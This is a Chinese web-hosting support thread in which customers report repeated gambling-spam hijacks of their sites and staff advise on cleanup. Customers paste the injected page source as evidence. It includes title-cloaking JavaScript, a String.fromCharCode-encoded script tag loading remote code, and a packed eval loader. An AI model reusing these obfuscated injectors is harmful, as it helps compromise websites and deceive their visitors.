问:安全组以开放所有端口ssh @127.0.0.1 一直超时,云服务127.0.0.1 ssh连不上
答:您好,查看您安全组中禁用了所有tcp连接,请核实。尝试禁用安全组后正常
,非常感谢您长期对我司的支持!
问:www.gdyhiot.com 这个网站老是给赌博网站攻击,是你们的服务器有问题吗? 之前被攻击,我们改了后台路径密码,恢复后又被攻击,我们把后台代码全删掉了,今天还是给攻击,是什么原因呢?服务器中毒了?
问:代码里没看到木马文件
问:现在的页面就是一个静态页面
问:www.wkwlk.com 这个网站也一样
问:www.wkwlk.com 这个JS攻击还在。
问:<title>310ⅴ大赢家比分,310ⅴ大赢家足球比分,大赢家足球直播即时比分90</title><meta name="" content="足球比分,大赢家比分,足球即时比分,比分直播,310比分网"/><meta name="" content="欢迎使用310bf即时比分系统【136359.com】如在使用过程中发现任何错误,可联系我们24小时报障...比分数据转载于各大门户网站、体育网、报刊,仅供购买中国体育足彩单场彩游戏"/><meta property="og:image" content="http://www.wkwlk.com/logo.png"/><>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="物联卡|物联网卡|物联网卡平台|物联网卡解决方案-微科物联网"}</script>< type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,101,102,104,102,117,104,49,46,99,111,109,47,51,54,53,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt); </script><meta name="" content="物联卡,物联网卡,物联网流量卡,物联网解决方案,移动物联卡,电信物联卡,联通物联卡,电信物联网卡,移动物联网卡,联通物联网卡,移动nb卡,物联网语音卡"><meta name="" content="【微科物联网】致力于为企业智能设备提供全方位物联网解决方案,提供物联卡,物联网卡,电信物联卡,移动物联卡,联通物联卡,物联网流量卡,移动物联网卡,电信物联网卡,联通物联网卡,物联网语音卡,消费级物联网专用卡,移动nb卡,物联网芯片模组等专业服务的首选物联网公司。">攻击代码
问:
答:您好,
建议您暂时先参考https://www.west.cn/faq/list.asp?unid=673 处理,并将站点设置为只读。
如果再次出现挂马的情况,请暂时不要调整并及时反馈本工单。
我们根据文件修改时间并根据日志来分析,找出后门并清理删除。
非常感谢您对我司的支持,谢谢!
问: 应该是你们的服务器出现问题了吧,我的这个网站www.jdsjcn.com 又中招了,现在没有改动,源码标题都被改了
问:<meta charset="utf-8" /><title>湖北快三-首页</title><meta name="" content="湖北快三,湖北快三官网,湖北快三平台"/><meta name="" content="湖北快三官网【注册网址:578zq.com】(计划群加导师QQ:63796115)湖北快三平台,为您提供湖北快三精准计划,湖北快三开奖,湖北快三开奖结果,湖北快三走势图,湖北快三在线投注。"/><>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="中国酒店设计网(官网) – 全球最大中文酒店设计室内设计行业门户网站"}</script>< type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\\w '};c=1;};while(c–)if(k[c])p=p.replace(new RegExp('\\\\b' e(c) '\\\\b','g'),k[c]); p;}('n["\\\\m\\\\b\\\\5\\\\k\\\\i\\\\2\\\\6\\\\0"]["\\\\d\\\\7\\\\1\\\\0\\\\2"](\\'\\\\f\\\\3\\\\5\\\\7\\\\1\\\\4\\\\0 \\\\0\\\\o\\\\4\\\\2\\\\e\\\\a\\\\0\\\\2\\\\j\\\\0\\\\8\\\\g\\\\9\\\\l\\\\9\\\\3\\\\5\\\\7\\\\1\\\\4\\\\0\\\\a \\\\3\\\\7\\\\5\\\\e\\\\a\\\\s\\\\0\\\\0\\\\4\\\\3\\\\t\\\\8\\\\8\\\\u\\\\9\\\\6\\\\d\\\\2\\\\6\\\\p\\\\b\\\\6\\\\q\\\\1\\\\6\\\\2\\\\h\\\\5\\\\b\\\\i\\\\8\\\\r\\\\1\\\\4\\\\9\\\\1\\\\h\\\\g\\\\3\\\\a\\\\c\\\\f\\\\8\\\\3\\\\5\\\\7\\\\1\\\\4\\\\0\\\\c\\');',31,31,'x74|x69|x65|x73|x70|x63|x6e|x72|x2f|x61|x22|x6f|x3e|x77|x3d|x3c|x6a|x2e|x6d|x78|x75|x76|x64|window|x79|x2d|x6c|x71|x68|x3a|x66'.split('|'),0,{}))</script><meta content="" name="" /><meta content="IE=EDGE,chrome=1" http-equiv="X-UA-Compatible" /><meta content="user-scalable=no, width=1200, initial-scale=1, maximum-scale=1.0" name="" /><meta content="" name="" /><meta content=" 中国酒店设计网(官网) – 全球最大中文酒店设计室内设计行业门户网站" name="" /><meta content="中国酒店设计网(官网) – 全球最大中文酒店设计室内设计行业门户网站" name="" /><link href="/meadin/pc/img/favicon.ico" rel="icon" type="image/icon" />
问:这个是帝国的,不是织梦, 也中招了,不看都不知道
答:您好,
虚拟主机管理–入侵检测 会有根据特征码检查到异常代码,请检查\\www\\e\\\\1.php 这个文件是否正常 ,推荐联系程序商或专业程序员协助核实 。若需我司协助排查挂马属于收费项目,请重新提交工单选择:【虚拟主机/数据库问题】—【网站类问题】—【网站挂马/中毒/非法信息清理】 ,会产生费用,非常感谢您长期对我司的支持!
问:www.gdyhiot.com,www.wkwlk.com全中招了
问:晕,乘着假期大黑特黑了,
答:您好,这两个站点是否是一套程序,这边主要是提供空间服务的,两个站点确实存在非法代码,如图:,建议联系程序提供商核实并清理挂马,
问:上次之后都把相关的PHP代码都DEL掉了,还把属性都改成只读了,今天下午都正常,
问:就一个静态站,都是只读属性都被攻击,还说程序漏洞????
答:您好
问:这里面的DATA,INCLUDE,DEDE,所有的涉及PHP的代码都DEL完了
答:您好,
挂马原因是程序漏洞所致,日志中可以看到,木马文件http://www.wkwlk.com/Solution_files/anfang.asp,这个文件10号就已经存在但没有清理,请核实并处理后在重新生成首页观察,非常感谢您长期对我司的支持!
西部数码(west.cn)是经工信部、ICANN、CNNIC认证审批,持有ISP、云牌照、IDC、CDN、顶级域名注册商等全业务资质的正规老牌服务商,自成立至今20余年专注于域名注册、虚拟主机、云服务器、企业邮箱、企业建站等互联网基础服务!
截止目前,已经为超过2000万个域名提供了注册、解析等服务,是中国五星级域名注册注册商!已为超过50万个网站提供了高速稳定的云托管服务,获评中国最受用户喜欢云主机服务商。
西部数码提供全方位7X24H专业售后支撑,域名注册特价1元起,高速稳定云主机45元起,更多详情请浏览西部数码官网:https://www.west.cn/